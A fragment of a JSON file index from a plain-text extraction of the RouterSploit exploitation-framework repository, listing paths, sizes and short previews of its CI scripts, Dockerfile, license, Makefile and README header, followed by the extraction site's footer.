},
{
"path": ".travis/install.sh",
"chars": 510,
"preview": "#!/bin/bash\n\nset -e\nset -x\n\nif [[ \"$(uname -s)\" == 'Darwin' ]]; then\n sw_vers\n\n git clone --depth 1 https://github"
},
{
"path": ".travis/run.sh",
"chars": 211,
"preview": "#!/bin/bash\n\nset -e\nset -x\n\nif [[ \"$(uname -s)\" == \"Darwin\" ]]; then\n PYENV_ROOT=\"$HOME/.pyenv\"\n PATH=\"$PYENV_ROOT"
},
{
"path": ".travis.yml",
"chars": 212,
"preview": "language: python\n\nmatrix:\n include:\n - os: linux\n python: 3.6\n\n - os: osx\n language: generic\n env:"
},
{
"path": "CONTRIBUTING.md",
"chars": 1710,
"preview": "# Contribution Guidelines\n\nThere are many ways to contribute to RouterSploit project, and the routersploit team is grate"
},
{
"path": "Dockerfile",
"chars": 342,
"preview": "FROM python:3.9-bookworm\n\nWORKDIR /routersploit\n\nRUN useradd rts -U -m && \\\n chown -R rts:rts /routersploit\n\nUSER rts"
},
{
"path": "LICENSE",
"chars": 1844,
"preview": "Copyright 2018, The RouterSploit Framework (RSF) by Threat9 \nAll rights reserved. \n\nRedistribution and use in source and"
},
{
"path": "MANIFEST.in",
"chars": 175,
"preview": "recursive-include routersploit/resources/ssh_keys *.json *.key\nrecursive-include routersploit/resources/vendors *.dat\nre"
},
{
"path": "Makefile",
"chars": 1082,
"preview": ".PHONY: build run test lint lint-modules clean prune help\n\nDIRECTORY=.\nEXCLUDED=.git,rsf.py\nRSF_IMAGE=routersploit\nFLAKE"
},
{
"path": "README.md",
"chars": 3702,
"preview": "# RouterSploit - Exploitation Framework for Embedded Devices\n\n[
About this extraction
This page contains the full source code of the threat9/routersploit GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 1215 files (1.5 MB), approximately 457.5k tokens, and a symbol index with 1615 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.